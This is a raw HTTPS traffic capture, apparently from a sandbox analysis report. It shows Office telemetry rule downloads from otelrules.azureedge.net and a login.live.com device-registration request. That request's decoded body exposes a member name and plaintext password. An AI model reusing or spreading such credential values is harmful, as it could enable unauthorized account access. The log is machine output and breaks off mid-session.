                                                                                                                                                      2024-12-04 12:59:03 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      31192.168.2.44979713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:03 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:03 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 632
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                                      x-ms-request-id: 4a622c55-e01e-0099-7fc1-45da8a000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125903Z-1746fd949bdwt8wrhC1EWRu6rg00000001c0000000007nbp
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:03 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      32192.168.2.44979813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:03 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:03 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 415
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                                      x-ms-request-id: d3611829-901e-007b-22c2-45ac50000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125903Z-1746fd949bdkw94lhC1EWRxuz400000001ag00000000a8k4
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      33192.168.2.44979613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:03 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:03 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 471
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                                      x-ms-request-id: c2908fd4-501e-00a0-4ac8-459d9f000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125903Z-1746fd949bd6zq92hC1EWRry48000000017000000000608r
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:03 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      34192.168.2.44979913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:03 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:03 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 467
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                                      x-ms-request-id: dbf49064-101e-00a2-1bc6-459f2e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125903Z-1746fd949bdmv56chC1EWRypnn00000001dg0000000051tq
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:03 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      35192.168.2.44979440.126.53.17443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:03 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                      Accept: */*
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                      Content-Length: 7642
                                                                                                                                                      Host: login.live.com
                                                                                                                                                      2024-12-04 12:59:03 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 66 6f 63 75 6e 63 70 64 63 68 73 6d 7a 71 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 61 38 40 4a 64 49 6a 2f 7a 23 42 35 71 46 48 74 72 62 42 43 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 61 6b 71 72 6c 66 67 75 6b 69 6a 65 76 6c 3c 2f 4f 6c 64 4d
                                                                                                                                                      Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02focuncpdchsmzq</Membername><Password>a8@JdIj/z#B5qFHtrbBC</Password></Authentication><OldMembername>02akqrlfgukijevl</OldM
                                                                                                                                                      2024-12-04 12:59:08 UTC542INHTTP/1.1 200 OK
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Expires: Wed, 04 Dec 2024 12:58:03 GMT
                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                      x-ms-route-info: C528_BAY
                                                                                                                                                      x-ms-request-id: 22e4c8af-299b-44c0-8f05-c5dc20a9e5bb
                                                                                                                                                      PPServer: PPV: 30 H: PH1PEPF00011EB5 V: 0
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:08 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 17166
                                                                                                                                                      2024-12-04 12:59:08 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 38 30 31 30 36 41 38 30 46 43 34 32 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 33 37 66 39 66 30 66 39 2d 36 33 31 65 2d 34 37 38 31 2d 61 65 35 64 2d 62 37 63 63 37 64 35 63 36 32 62 36 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                      Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>001880106A80FC42</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="37f9f0f9-631e-4781-ae5d-b7cc7d5c62b6" LicenseID="3252b20c-d425-4711
                                                                                                                                                      2024-12-04 12:59:08 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                      Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      36192.168.2.44980313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:05 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:05 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 486
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                                      x-ms-request-id: 6223bc78-401e-0015-38b6-450e8d000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125905Z-1746fd949bdzd2qvhC1EWRcygw00000000w000000000a53a
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      37192.168.2.44980213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:05 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:05 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 427
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                                      x-ms-request-id: 6818e2c2-d01e-0065-16d2-45b77a000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125905Z-1746fd949bdlqd7fhC1EWR6vt000000001b0000000008z8c
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:05 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      38192.168.2.44980113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:05 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:05 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 486
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                                      x-ms-request-id: c2a94a43-501e-00a0-7dd0-459d9f000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125905Z-1746fd949bdw2rg8hC1EWR11u400000001m00000000023vb
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      39192.168.2.44980413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:05 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:05 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 407
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                                      x-ms-request-id: 864f0b94-901e-00a0-42cc-456a6d000000
                                                                                                                                                      x-ms-version: 2018-03-28
